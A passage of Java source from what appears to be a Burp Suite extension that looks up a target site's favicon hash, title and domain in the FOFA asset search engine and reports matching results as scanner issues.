34 | //callbacks.printOutput("if enable fofa info based on icon: " + Global.config.getConfigFofa_Ico_value()); 35 | if (!Global.config.getConfigFofa_Ico_value()) { 36 | return issues; 37 | } 38 | URL baseUrl = callbacks.getHelpers().analyzeRequest(baseRequestResponse).getUrl(); 39 | callbacks.printOutput("fofa info based on icon url: " + baseUrl.toString()); 40 | try { 41 | String StrBaseUrl = Utils.getBaseUrl(baseUrl); 42 | callbacks.printOutput("fofa info based on icon StrBaseUrl: " + StrBaseUrl); 43 | String iconPath = Utils.getIconUrlString(new URL(StrBaseUrl)); 44 | String iconUrl = StrBaseUrl + iconPath; 45 | callbacks.printOutput("Get iconUrl: " + iconUrl); 46 | assert iconPath != null; 47 | if (iconPath.replaceAll("/", "").equals("")) { 48 | callbacks.printOutput("fofa info based on icon found no icon file: " + StrBaseUrl); 49 | return issues; 50 | } 51 | byte[] iconResp = Utils.httpGet(iconUrl); 52 | // callbacks.printOutput("fofa info based on icon iconResp: " + callbacks.getHelpers().bytesToString(iconResp)); 53 | String iconB64 = callbacks.getHelpers().base64Encode(iconResp); 54 | // callbacks.printOutput("fofa info based on icon base64: " + iconB64); 55 | String q = String.format("icon_hash=\"%s\"", Utils.iconb64Hash(iconB64)); 56 | FofaData fofaData = client.getData(q); 57 | callbacks.printOutput("Get fofa info based on icon: " + fofaData); 58 | List> fofaResults = fofaData.getResults(); 59 | if (!fofaResults.isEmpty()){ 60 | issues.add( 61 | reporter( 62 | "Fofa Information found (ICON)", 63 | String.format("Info:
%s
"+ 64 | "Link:
%s
", 65 | fofaData, 66 | parseResults(fofaResults) 67 | ), 68 | "Low", 69 | "Certain", 70 | baseRequestResponse 71 | ) 72 | ); 73 | } 74 | } catch (Exception e) { 75 | callbacks.printError(String.format("Error in doGetFofaInfo: %s", Utils.getStackMsg(e))); 76 | return issues; 77 | } 78 | //} 79 | return issues; 80 | } 81 | 82 | public List doGetFofaInfo_Title(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) { 83 | List issues = new ArrayList<>(); 84 | IHttpRequestResponse pairNegative = fetchURL(baseRequestResponse, "/" + Utils.getRandomString(10)); 85 | String email = Global.config.getConfigFofa_Email_value(); 86 | String key = Global.config.getConfigFofa_ApiKey_value(); 87 | FofaClient client = new FofaClient(email, key); 88 | //callbacks.printOutput("if enable fofa info based on title: " + Global.config.getConfigFofa_Title_value()); 89 | if (!Global.config.getConfigFofa_Title_value()) { 90 | return issues; 91 | } 92 | byte[] responseBody = Arrays.copyOfRange( 93 | baseRequestResponse.getResponse(), 94 | callbacks.getHelpers().analyzeResponse(baseRequestResponse.getResponse()).getBodyOffset(), 95 | baseRequestResponse.getResponse().length 96 | ); 97 | URL baseUrl = callbacks.getHelpers().analyzeRequest(baseRequestResponse).getUrl(); 98 | String title = Utils.getWebsiteTitle(baseUrl); 99 | callbacks.printOutput("fofa info based on Title: title = " + title); 100 | if (title.equals("0")|| title.equals("")){ 101 | return issues; 102 | } 103 | try { 104 | String q = String.format("title=\"%s\"", title); 105 | FofaData fofaData = client.getData(q); 106 | callbacks.printOutput("Get fofa info based on title: " + fofaData); 107 | List> fofaResults = fofaData.getResults(); 108 | if (!fofaResults.isEmpty()){ 109 | issues.add( 110 | reporter( 111 | "Fofa Information found (Title)", 112 | String.format("Info:
%s
"+ 113 | "Link:
%s
", 114 | fofaData, 115 | parseResults(fofaResults) 116 | ), 117 | "Low", 118 | "Certain", 119 | baseRequestResponse 120 | ) 121 | ); 122 | } 123 | } catch (Exception e) { 124 | callbacks.printError(String.format("Error in doGetFofaInfo: %s", Utils.getStackMsg(e))); 125 | return issues; 126 | } 127 | //} 128 | return issues; 129 | } 130 | 131 | public List doGetFofaInfo_Domain(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) { 132 | List issues = new ArrayList<>(); 133 | IHttpRequestResponse pairNegative = fetchURL(baseRequestResponse, "/" + Utils.getRandomString(10)); 134 | String email = Global.config.getConfigFofa_Email_value(); 135 | String key = Global.config.getConfigFofa_ApiKey_value(); 136 | FofaClient client = new FofaClient(email, key); 137 | //callbacks.printOutput("if enable fofa info based on Domain: " + Global.config.getConfigFofa_Domain_value()); 138 | if (!Global.config.getConfigFofa_Domain_value()) { 139 | return issues; 140 | } 141 | URL baseUrl = callbacks.getHelpers().analyzeRequest(baseRequestResponse).getUrl(); 142 | String topDomain = DomainTool.getDomainName(baseUrl); 143 | if (topDomain.equals("")){ 144 | return issues; 145 | } 146 | try { 147 | String q = String.format("domain=\"%s\"", topDomain); 148 | FofaData fofaData = client.getData(q); 149 | callbacks.printOutput("Get fofa info based on domain: " + fofaData); 150 | List> fofaResults = fofaData.getResults(); 151 | if (!fofaResults.isEmpty()){ 152 | issues.add( 153 | reporter( 154 | "Fofa Information found (Domain)", 155 | String.format("Info:
%s
"+ 156 | "Link:
%s
", 157 | fofaData, 158 | parseResults(fofaResults) 159 | ), 160 | "Low", 161 | "Certain", 162 | baseRequestResponse 163 | ) 164 | ); 165 | } 166 | } catch (Exception e) { 167 | callbacks.printError(String.format("Error in doGetFofaInfo: %s", Utils.getStackMsg(e))); 168 | return issues; 169 | } 170 | //} 171 | return issues; 172 | } 173 | private IHttpRequestResponse fetchURL(IHttpRequestResponse basePair, String newPath) { 174 | String path = this.helpers.analyzeRequest(basePair).getUrl().getPath(); 175 | String newReq = new String(basePair.getRequest()).replace(path, newPath); 176 | return callbacks.makeHttpRequest(basePair.getHttpService(), newReq.getBytes()); 177 | } 178 | 179 | private IHttpRequestResponse fetchURLWithNewReq(IHttpRequestResponse basePair, String path) throws MalformedURLException { 180 | URL oldURL = this.helpers.analyzeRequest(basePair).getUrl(); 181 | String baseURL = Utils.getBaseUrl(oldURL); 182 | byte[] newReq = this.helpers.buildHttpRequest(new URL(baseURL + path)); 183 | return callbacks.makeHttpRequest(basePair.getHttpService(), newReq); 184 | } 185 | private String parseResults(List> fofaResults){ 186 | StringBuilder rst = new StringBuilder(); 187 | // System.out.println(fofaResults.get(0).getClass()); 188 | for (Object fofaResult: fofaResults){ 189 | if (fofaResult.toString().contains("://")){ 190 | rst.append(String.format("%s
", 191 | fofaResult, 192 | fofaResult 193 | )); 194 | }else{ 195 | rst.append(fofaResult).append("
"); 196 | } 197 | } 198 | return rst.toString(); 199 | } 200 | } --------------------------------------------------------------------------------